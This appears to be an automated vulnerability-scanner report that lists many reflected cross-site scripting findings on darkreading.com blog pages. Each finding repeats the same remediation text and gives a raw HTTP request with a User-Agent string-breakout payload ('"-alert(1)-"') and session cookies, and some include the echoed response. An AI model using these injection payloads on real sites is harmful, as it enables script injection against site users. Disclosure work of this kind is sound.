This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/ HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)88437"-alert(1)-"b49e17ca852 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa856"-alert(1)-"86db91f7b1a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700484/real-life-social-engineering.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa856"-alert(1)-"86db91f7b1a Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665d1"-alert(1)-"c6d10119106 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700498/finding-exposed-devices-on-your-network.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)665d1"-alert(1)-"c6d10119106 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84036"-alert(1)-"d5c28c9e3d9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700510/relying-on-tools-makes-you-dumber.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)84036"-alert(1)-"d5c28c9e3d9 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Relying O ...[SNIP]... s Makes You Dumber"; s.prop4="Relying On Tools Makes You Dumber"; s.prop5="blog"; s.prop6=""; s.prop7="John H. Sawyer"; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)84036"-alert(1)-"d5c28c9e3d9"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21=""; /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73843"-alert(1)-"ff1f8c8dc8f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)73843"-alert(1)-"ff1f8c8dc8f Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e6e"-alert(1)-"6d7c7eb0628 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700535/using-the-36-stratagems-for-social-engineering.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b9e6e"-alert(1)-"6d7c7eb0628 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccaad"-alert(1)-"9130fa4a87d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700545/snort-ing-out-anomalies.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ccaad"-alert(1)-"9130fa4a87d Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51385"-alert(1)-"1c871573409 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700548/real-world-attacks-with-social-engineering-tookit.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)51385"-alert(1)-"1c871573409 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef9e3"-alert(1)-"bcb3ef2f77e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700577/suspected-child-porn-hub-taken-offline.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ef9e3"-alert(1)-"bcb3ef2f77e Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e457e"-alert(1)-"1a832d67b15 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700656/friction-free-security.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e457e"-alert(1)-"1a832d67b15 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee26"-alert(1)-"b57a5ef6273 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700682/protecting-your-network-from-the-unpatchable.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dee26"-alert(1)-"b57a5ef6273 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e98f"-alert(1)-"b78283368b2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700741/conquering-large-web-apps-with-solid-methodology.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3e98f"-alert(1)-"b78283368b2 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7f91"-alert(1)-"60534d819ae was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c7f91"-alert(1)-"60534d819ae Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efc8d"-alert(1)-"bb0b242632c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700767/protecting-ssh-from-the-masses.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)efc8d"-alert(1)-"bb0b242632c Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4864c"-alert(1)-"c42f9dfdcd5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700795/there-s-a-recipe-for-that.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4864c"-alert(1)-"c42f9dfdcd5 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26537"-alert(1)-"736a47e9d9a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700800/security-s-top-4-social-engineers-of-all-time.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)26537"-alert(1)-"736a47e9d9a Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4e16"-alert(1)-"dc654227b78 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700826/taking-usb-attacks-to-the-next-level.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4e16"-alert(1)-"dc654227b78 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Taking US ...[SNIP]... The Next Level"; s.prop4="Taking USB Attacks To The Next Level"; s.prop5="blog"; s.prop6=""; s.prop7="John H. Sawyer"; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4e16"-alert(1)-"dc654227b78"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21=""; /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df4a"-alert(1)-"a1951b512e5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700830/detection-and-defense-of-windows-autorun-locations.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1df4a"-alert(1)-"a1951b512e5 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6254"-alert(1)-"5d6cef25ebb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700832/make-security-about-security-not-compliance.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b6254"-alert(1)-"5d6cef25ebb Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8e20"-alert(1)-"4bc26a1db4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8e20"-alert(1)-"4bc26a1db4 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>That Was ...[SNIP]... hat Was Easy: New Tool For Web Form Password Brute Force Attacks"; s.prop5="blog"; s.prop6=""; s.prop7="John H. Sawyer"; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8e20"-alert(1)-"4bc26a1db4"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21=""; /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2ef5"-alert(1)-"f513882b49 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700845/ways-to-slow-an-attacker.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a2ef5"-alert(1)-"f513882b49 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794a5"-alert(1)-"f2d3c3fa726 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)794a5"-alert(1)-"f2d3c3fa726 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc47a"-alert(1)-"c29eabe679 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700848/vxworks-vulnerability-tools-released.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bc47a"-alert(1)-"c29eabe679 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94dc3"-alert(1)-"6e091a98372 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94dc3"-alert(1)-"6e091a98372 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42324"-alert(1)-"caed85c53b3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
